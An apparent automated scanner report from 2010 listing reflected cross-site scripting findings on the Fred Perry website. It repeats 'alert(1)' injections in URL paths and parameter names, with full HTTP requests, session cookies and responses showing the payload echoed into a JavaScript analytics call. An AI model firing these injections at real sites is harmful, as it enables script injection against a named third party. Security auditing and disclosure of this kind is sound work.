This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /site-map/?79ccb"-alert(1)-"2a6cc699b53=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Site Ma ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/site-map/?79ccb"-alert(1)-"2a6cc699b53=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0bde"-alert(1)-"e890c6a858c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /womena0bde"-alert(1)-"e890c6a858c/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:00:42 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=g3709uchv23iga3tdnoju2fa24; expires=Tue, 09-Nov-2010 17:00:42 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29341
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/womena0bde"-alert(1)-"e890c6a858c/"); //]]> ...[SNIP]...
1.248. http://www.fredperry.com/women/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/women/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa6ee"-alert(1)-"553b47cbfc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/?aa6ee"-alert(1)-"553b47cbfc3=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7ca2"-alert(1)-"8d9664b6ac4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /womenb7ca2"-alert(1)-"8d9664b6ac4/amy-winehouse-landing/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:04:33 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=uav4qcl07q89lvv7o5u01co5o4; expires=Tue, 09-Nov-2010 17:04:33 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/womenb7ca2"-alert(1)-"8d9664b6ac4/amy-winehouse-landing/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a60ae"-alert(1)-"0aeb64a8199 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/amy-winehouse-landinga60ae"-alert(1)-"0aeb64a8199/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:04:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=5grts2msu40i2sei9s2rh51qq3; expires=Tue, 09-Nov-2010 17:04:52 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women/amy-winehouse-landinga60ae"-alert(1)-"0aeb64a8199/"); //]]> ...[SNIP]...
1.251. http://www.fredperry.com/women/amy-winehouse-landing/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/women/amy-winehouse-landing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7af5"-alert(1)-"7367eb33b78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/amy-winehouse-landing/?c7af5"-alert(1)-"7367eb33b78=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fec6"-alert(1)-"0f7c2574e94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women8fec6"-alert(1)-"0f7c2574e94/amy-winehouse/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:10:59 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=mb073il2o1r8resr30jv271527; expires=Tue, 09-Nov-2010 17:10:59 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women8fec6"-alert(1)-"0f7c2574e94/amy-winehouse/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92813"-alert(1)-"4542ebe28f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/amy-winehouse92813"-alert(1)-"4542ebe28f8/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:11:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=bj52mihcqnv87j59oben847e36; expires=Tue, 09-Nov-2010 17:11:21 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women/amy-winehouse92813"-alert(1)-"4542ebe28f8/"); //]]> ...[SNIP]...
1.254. http://www.fredperry.com/women/amy-winehouse/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/women/amy-winehouse/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9291"-alert(1)-"93024d59deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/amy-winehouse/?d9291"-alert(1)-"93024d59deb=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25282"-alert(1)-"158d6988500 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women25282"-alert(1)-"158d6988500/dresses/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:07:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=jfe33a0hqu3ps2h8sq0i0aat74; expires=Tue, 09-Nov-2010 17:07:10 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women25282"-alert(1)-"158d6988500/dresses/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb509"-alert(1)-"f266c581b8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/dressescb509"-alert(1)-"f266c581b8c/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:07:31 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=f086sn2pv4tc4qtl4v9125gp50; expires=Tue, 09-Nov-2010 17:07:31 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women/dressescb509"-alert(1)-"f266c581b8c/"); //]]> ...[SNIP]...
1.257. http://www.fredperry.com/women/dresses/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/women/dresses/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e413f"-alert(1)-"b0fd3b1a901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/dresses/?e413f"-alert(1)-"b0fd3b1a901=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ceb63"-alert(1)-"988eea48a0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /womenceb63"-alert(1)-"988eea48a0f/jackets/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:06:56 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=r2u0bkdmhpeoie140jqga16s62; expires=Tue, 09-Nov-2010 17:06:56 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/womenceb63"-alert(1)-"988eea48a0f/jackets/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43191"-alert(1)-"f4d25c2ca9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/jackets43191"-alert(1)-"f4d25c2ca9e/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:07:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=ao426si1mmbbjr0edk92t0aes3; expires=Tue, 09-Nov-2010 17:07:10 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women/jackets43191"-alert(1)-"f4d25c2ca9e/"); //]]> ...[SNIP]...
1.260. http://www.fredperry.com/women/jackets/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/women/jackets/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a4b8"-alert(1)-"3bbedec9e5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/jackets/?2a4b8"-alert(1)-"3bbedec9e5f=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11b29"-alert(1)-"273e9eef3e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women11b29"-alert(1)-"273e9eef3e5/knitwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:05:47 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=4o7qubhm2bo1i8btr5tc4oect0; expires=Tue, 09-Nov-2010 17:05:47 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29350
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women11b29"-alert(1)-"273e9eef3e5/knitwear/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e61f7"-alert(1)-"884c352a4e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women/knitweare61f7"-alert(1)-"884c352a4e4/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:06:08 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=mi0e2ngejjg98skppdnt2esdr6; expires=Tue, 09-Nov-2010 17:06:08 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29350
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/women/knitweare61f7"-alert(1)-"884c352a4e4/"); //]]> ...[SNIP]...
1.263. http://www.fredperry.com/women/knitwear/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/women/knitwear/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44619"-alert(1)-"dbe8083a92f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
